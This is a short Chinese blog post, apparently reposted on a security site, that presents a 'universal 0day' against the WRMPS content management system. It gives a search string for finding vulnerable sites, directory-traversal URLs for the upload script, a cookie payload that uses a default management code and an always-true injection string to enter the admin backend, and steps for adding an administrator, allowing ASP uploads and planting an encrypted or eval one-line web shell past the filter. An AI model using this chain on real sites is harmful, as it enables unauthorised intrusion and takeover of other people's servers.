Nov18th

网人信息发布系统(WRMPS)通杀0day

freboys | 漏洞收集 | 评论:0 | 引用:0 | 浏览:

转自红狼骚总

漏洞描述:
搜:Powered By WRMPS
1.注册-列目录
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/admin
这个利用不大 ,密码只取MD5前十位,2B得很.
2.COOKIE欺骗进后台
admin/admin_main.asp or admin/admin_menu.asp 
admin=ManageCode=WRMPS6&admin=a' or '1'='1&pass=a' or '1'='1&flag=,&FlagGroup=0 

漏洞测试:
有些后台不需要认证码ManageCode=默认WRMPS6,如果改了就只能猜了.
进了后台,添加管理员,添加上传类型ASP, 上传过滤了某些特殊代码,wscript.shell,execute之类的,直接传加密的马或者传eval的一句话就可以了。

 

  • 相关文章:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。


关于本站 | 安全业务 | 联系我们 | 广告服务 | 友情链接 | 加入收藏夹

Copyright 2008-2010 无忧安全网 All rights reserved.Powered By Z-Blog

ICP备案编号:闽ICP备09054386号